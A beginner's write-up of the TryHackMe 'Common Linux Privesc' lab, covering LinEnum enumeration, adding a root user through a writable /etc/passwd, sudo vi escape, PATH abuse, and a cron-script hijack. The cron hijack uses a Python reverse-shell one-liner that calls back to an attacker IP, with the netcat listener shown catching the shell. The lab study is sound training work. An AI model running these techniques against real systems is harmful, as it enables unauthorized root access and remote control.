TryHackMe(THM):Common Linux Privesc-Writeup
Hi! Today I’m going to write a Writeup for Try Hack Me.
I’m on the Learning Paths of a COMPLETE BEGINNER.
The targeted room is Common Linux Privesc.(By the way, what is Privesc?)
Skip where you don’t need an answer.
I will not write a direct answer, just a hint.
First of all, I ran LinEnum according to the instructions and left the result in the text.
$/.LinEnum.sh > out_LinEnum.txt
# 2 What is the target’s hostname?
$ more out_LinEnum.txt
#3 Look at the output of /etc/passwd how many “user[x]” are there on the system?
[-] Group memberships:
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)
#4 How many available shells are there on the system?
[-] Available shells:
# /etc/shells: valid login shells
#5 What is the name of the bash script that is set to run every 5 minutes by cron?
[-] Crontab contents:
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
#6 What critical file has had its permissions changed to allow some users to write to it?
[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow
I didn’t notice it because it was written at the bottom.😓
Abusing SUID/GUID Files
#1 What is the path of the file in user3’s directory that stands out to you?
Exploiting Writeable /etc/passwd
I was very excited when this was successful for the first time!😁
#2 Having read the information above, what direction privilege escalation is this attack?
Remember the tree
#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?
user@kali:~$ openssl passwd -1 -salt new 123
#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?
Just refer to this↓. I didn’t understand the meaning of the hint.
Escaping Vi Editor
#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?
$ sudo -l
*snip*User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi
#3 What is the flag to specify a payload in msfvenom?
$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe*snip*
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
#5 What directory is the “autoscript.sh” under?
grep -r "autoscript.sh" /*
*snip*/etc/crontab:*/5 * * * * root /home/user4/Desktop/autoscript.sh
After waiting 5 minutes, the essential payload didn’t work.😭
I searched the internet and got the following script. This worked.
printf “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”10.**.**.**\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’\n” > /home/user4/Desktop/autoscript.sh
When I listened on port 1234, I was able to receive the shell!
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.4.16.12] from (UNKNOWN) [10.10.112.25] 48904
/bin/sh: 0: can't access tty; job control turned off
Exploiting PATH Variable
#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?
Desktop Documents Downloads Music Pictures Public script Templates Videos
#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo “[whatever command we want to run]” > [name of the executable we’re imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating
Just refer to this↓
echo "[whatever command we want to run]" > [name of the executable we're imitating]
#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?
I already learned in the "Learn Linux" room.
according to The syntax of this command is typically chmod <permissions> <file>.
Thank you for reading.